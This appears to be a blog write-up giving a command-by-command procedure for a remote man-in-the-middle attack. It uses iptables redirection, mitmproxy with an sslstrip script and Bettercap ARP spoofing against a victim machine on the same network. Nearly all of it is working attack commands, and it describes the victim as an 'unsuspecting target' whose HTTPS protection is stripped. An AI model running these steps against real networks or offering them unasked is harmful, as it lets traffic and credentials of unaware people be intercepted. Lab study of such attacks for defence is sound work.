|| Date: 19-01-06 || Back to index ||
|| Tag: write-up ||

Remote Man-in-the-Middle with Bettercap and Mitmproxy

Remote MITM Setup

Basic Environment Setup

Hook the attack machine (which I’ll call BlackArch) and the victim machine (which I’ll call Alice) to the same network. I did this in testing by having both of them in a Bridged network configuration under my phone’s hotspot. Safe and Secure®.

We’ll need to setup some IP forwarding and redirection first.

Setup IP Forwarding and Redirection

$ sysctl -w net.ipv4.ip_forward=1
$ sysctl -w net.ipv6.conf.all.forwarding=1
$ iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
$ iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080
$ ip6tables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
$ ip6tables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080

mitmproxy will take care of the rest

Setup the Proxy: MitmProxy

Link: https://mitmproxy.org/

$ mitmproxy --mode transparent --showhost -s sslstrip.py   # -- showhost will show the host in the URL display

Okay, we have ip forwarding setup. We’ve got redirection to port 8080 (mitmproxy port). And we have a proxy setup to intercept anything going there (HTTP and HTTPS).

The sslstrip.py script is there to strip-out HTTPS headers during a redirection. It’s not ideal for navigating in-between the pages, but an unsuspecting target will be vulnerable. Download it from here.

If you’re doing this locally (not to a remote target) for the purposes of dynamic analysis or whatever, don’t use sslstrip.py and navigate to mitm.it AFTER the arp spoofing step to install mitmproxy’s SSL certificates

ARP Spoofing with Bettercap

Link: https://github.com/bettercap/bettercap

NOTE: you can actually setup a proxy with Bettercap’s http.proxy and https.proxy modules. I love it and it works like magic, but I’d rather have one tool do one thing. To be frank, I would even use Burp as the proxy instead, but I prefer mitmproxy since its CLI-based and works in a pinch.

Install and run Bettercap on BlackArch.

Conduct a small nmap scan to figure out what’s Alice’s IP. Let’s say we found out it’s 10.10.10.4

Conduct the ARP spoof:

>     $ sudo bettercap -iface enp0s3
>     >> net.recon off                                  # Disable net.recon modules
>     >> set arp.spoof.target 10.10.10.4; arp.spoof on;
>     >> set net.sniff.local true                       # ONLY IF DONE REMOTELY. Since the redirection occurs to my machine, packets are local
>     >> net.sniff on                                   # Sniff the network, just to know if things are working. 
>                                                       # I won't see any HTTP packets here since I didn't run http.proxy module

If you’re on a local environment (not with a remote Alice), we can run arp -a on Alice now to see that BlackArch’s MAC address has been duplicated to the gateway as well.

We’re done. If you wanna do any web page replacements, it’s best to be done as a python script and attached with -s parameter with mitmproxy. Their GitHub page has a lot of examples in examples/ directory.

Appendix #1: Install Bettercap on Arch Linux

$ sudo pacman -S libnetfilter_queue libpcap mitmproxy
$ go get github.com/bettercap/bettercap

Appendix #2: Reset IP Forwarding and Redirection

$ sysctl -w net.ipv4.ip_forward=0
$ sysctl -w net.ipv6.conf.all.forwarding=0
$ iptables -t nat -D PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
$ iptables -t nat -D PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080
$ ip6tables -t nat -D PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
$ ip6tables -t nat -D PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080